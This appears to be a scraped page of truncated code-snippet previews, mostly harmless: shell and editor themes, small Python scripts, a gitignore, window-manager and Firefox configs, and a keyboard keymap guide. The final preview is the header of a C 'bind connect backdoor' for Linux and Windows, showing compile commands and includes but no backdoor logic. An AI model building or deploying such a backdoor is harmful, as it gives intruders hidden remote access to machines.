A ZSH theme optimized for people who use:
- Solarized
- Git
- Unicode-compatible fonts and terminals (I use iTerm2 + Menlo)
For Mac users, I highly recommend iTerm 2 + Solarized Dark
#!/usr/bin/env python3 | |
# -*- coding: utf-8 -*- | |
import tweepy | |
CONSUMER_KEY = '' | |
CONSUMER_SECRET = '' | |
ACCESS_KEY = '' | |
ACCESS_SECRET = '' |
import mechanize | |
import os | |
def find_recursively(starturl): | |
br = mechanize.Browser() | |
br.open(starturl) | |
links = br.links() | |
for a in links: | |
print "TEXT: "+a.text |
# Compiled source # | |
################### | |
*.com | |
*.class | |
*.dll | |
*.exe | |
*.o | |
*.so | |
# Packages # |
var MARGIN = 28; | |
// Fullscreen | |
slate.bind('f:cmd,alt', function(win) { | |
// ±4 to account for hidden Dock on left of screen. | |
win.doOperation(S.op('move', { | |
'x': 'screenOriginX - 4 + ' + MARGIN, | |
'y': 'screenOriginY + ' + MARGIN, |
#!/bin/bash | |
# SETTINGS | |
FONT="-shdw-candy-*-*-*--11-*-*-*-*-*-*-*" | |
RES="1366x14" | |
BG="#080608" | |
FG="#E8EAEC" | |
BLK="#525252" | |
RED="#A35656" | |
GRN="#A3A356" |
@namespace html url(http://www.w3.org/1999/xhtml); | |
@namespace xul url(http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul); | |
/* | |
Author: Twily | |
Description: Minimal flat styled tabs for Australis | |
Compitability: Firefox Nightly v31.0a1 - v32.0a1 (Australis) | |
CSS Variables were introduced to Firefox in v29.0a1 | |
Website: http://twily.info/ | |
#!/usr/bin/python3 | |
import csv | |
import tkinter | |
from tkinter.filedialog import askopenfilename | |
A = '' | |
B = '' | |
def close_window(): # destroying the main window | |
root.destroy() |
This is a quick guide to changing the keymap on the GH60 "Satan" or RevCHN. Note that the Satan is NOT a true GH60, and using the GH60 with the normal TMK would not work.
Note that installing dependencies or compiling TMK is not a part of the scope of this document. If you have problems with this part, seek help elsewhere. Not also that these instructions are written for Linux and Mac. If you're using windows, just use the Command Prompt for the git commands, and Windows Explorer to move and delete files.
git clone [email protected]:kairyu/tkg-toolkit.git tkg
[email protected]:kairyu/tmk_keyboard_custom.git tmk
// % cat readme | |
// Linux and Windows Bind connect Backdoor | |
// (Dev) -> b4d_tR1p | |
// linux: gcc bind.c -o bind -Wall --> without any error output c; | |
// windows: gcc.exe "C:/bind.c" -o "C:/bind.exe" -lws2_32 --> dont forget of '-lws2_32' | |
// ᕙ༼ຈل͜ຈ༽ᕗ | |
#ifdef WIN32 | |
#include <winsock2.h> | |
#pragma comment(lib,"ws2_32.lib") |